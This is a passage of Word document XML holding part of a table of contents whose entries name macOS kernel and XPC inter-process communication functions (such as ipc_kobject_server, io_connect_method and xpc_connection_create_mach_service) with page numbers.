                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>185</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48" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13.1.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(user)Mach_msg_overwrite</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313348 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18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49" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14.1.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(kernel)ipc_kobject_server</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313349 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>189</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0" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14.1.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>(kernel)Ipc_kmsg_get</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313350 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>194</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1" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14.1.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313351 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19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2" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14.1.4.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mig_buckets</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313352 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>206</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53" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Io_connect_method</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313353 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21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4" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14.2.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IOExternalMethodArguments</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313354 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21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5" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14.2.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>User mode</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313355 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>223</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56" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Io_service_get_matching_services</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313356 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>224</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57" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XPC</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313357 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>225</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58" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15.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58 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22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59" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15.1.1.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Server</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313359 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>226</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60" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15.1.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Client</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313360 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>227</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1" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15.2.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>xpc_connection_create_mach_service</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313361 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>227</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2" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15.3.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>xpc_connection_get_name</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313362 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>227</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3" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15.4.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>xpc_connection_send_message_with_reply_sync</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313363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4" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15.5.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>xpc_connection_set_event_handler</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313364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5" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15.6.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>_xpc_serializer_get_dispatch_mach_msg</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313365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6" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15.7.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>_xpc_TYPE_deserialize</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313366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7" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15.8.</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>_xpc_object_create</w:t>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0027225E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc445313367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68" w:history="1">
            <w:r w:rsidR="0027225E" w:rsidRPr="00E34867">
              <w:rPr>
